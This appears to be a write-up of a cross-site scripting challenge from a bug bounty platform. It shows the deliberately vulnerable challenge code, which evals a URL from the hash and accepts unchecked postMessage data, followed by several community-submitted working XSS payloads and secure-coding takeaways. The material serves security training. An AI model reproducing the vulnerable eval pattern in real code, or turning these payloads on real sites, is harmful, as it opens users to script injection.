A couple of days ago we released a XSS challenge. A few hours after sending out the tweet, we noticed the success of this. Therefore, we decided to share a blogpost with the lovely community.
For those who still want to try, the challenge is still up! => https://challenge.intigriti.io <=
In case it’s not available anymore or you want to host the challenge yourself, you can find the code below.
const url = new URL(decodeURIComponent(document.location.hash.substr(1))).href.replace(/script|/gi, "forbidden");
const iframe = document.createElement("iframe"); iframe.src = url; document.body.appendChild(iframe);
iframe.onload = function(){ window.addEventListener("message", executeCtx, false);}
function executeCtx(e) {
if(e.source == iframe.contentWindow){
e.data.location = window.location;
Object.assign(window, e.data);
eval(url);
}
}
Solution
We could write an in detail explanation on how to solve this challenge, but we couldn’t do a better job than Dominic and dPhoeniixx. Both researchers shared a well written and very detailed blogpost. You can find the link below.
Wondering how this challenge could be solved via a different way? Take a look at the payloads shared below.
https://challenge.intigriti.io/#data:text/html;var%20text=text;var%20html=html;alert(xss)//;base64,PGh0bWw+PGJvZHkgb25sb2FkPXhzcygpPjxzY3JpcHQ+IGZ1bmN0aW9uIHhzcygpIHsgcGFyZW50LnBvc3RNZXNzYWdlKHsneHNzJzogIm4wdG0zIn0sICcqJyk7IH07IDwvc2NyaXB0Pg==by n0tm3
https://challenge.intigriti.io/#data:text/html,alert()//%253Csvg/onload=%27top.postMessage(%7B%22text%22:%201%7D,%20%22*%22);top.postMessage(%7B%22html%22:%201%7D,%20%22*%22)%27%253E
by Karel_Origin
https://challenge.intigriti.io/#data:text/html;var%20text=alert%28%29;var%20html;base64,YWE8c3ZnL29ubG9hZD0idG9wLnBvc3RNZXNzYWdlKDAsJyonKSI+11by terjanq
https://challenge.intigriti.io/#data:text/html,alert(document.domain);//%253csvg%20onload=%22parent.postMessage({text:4,html:1},'*');%22%253eby daudmalik06
https://challenge.intigriti.io/#data:text/html,alert(document.domain)//%253C%2553cript%253Ewindow.parent.postMessage({text:%22%22,html:%22%22}%2C%20%22*%22)%253C%2F%2553cript%253Eby _zulln
One of the most common mistakes we saw was people executing the alert box inside the iframe. But that is not valid solution because the javascript doesn’t get triggered on challenge.intigriti.io but in the iframe itself (domain = null).
Overview of the tips
The four tips shared during the challenge:
First tip: “It’s all about that base, ’bout that base”.
Second tip: “Define the undefined”.
Third tip: “You don’t need any external resources.”
Forth tip: “Look for the charset.”
Key takeaways
- Instead of blindly using a wordlist of payloads, understand what you are doing. Go through the challenge step by step and make use of the debugger tool built-in your browser.
- Do not trust user input. Input validation is the key!
- Seeing a message event? Make sure you check the origin?
- Avoid the usage of eval().
- Do not give up. Patience is key.
Thank you!
A special thanks to @filedescriptor and @edoverflow for hardening our challenge!
Thanks to the community for participating in the challenge and congratulations to the 90 researchers who solved the challenge. A shout-out to the winner fenrir, who won a Burp License, swag package and private invites on our platform.
Want more?
Follow us on twitter and don’t forget to subscribe to our weekly Bug Bytes, a newsletter curated by Pentester Land & powered by intigriti containing more write-ups and helpful resources.
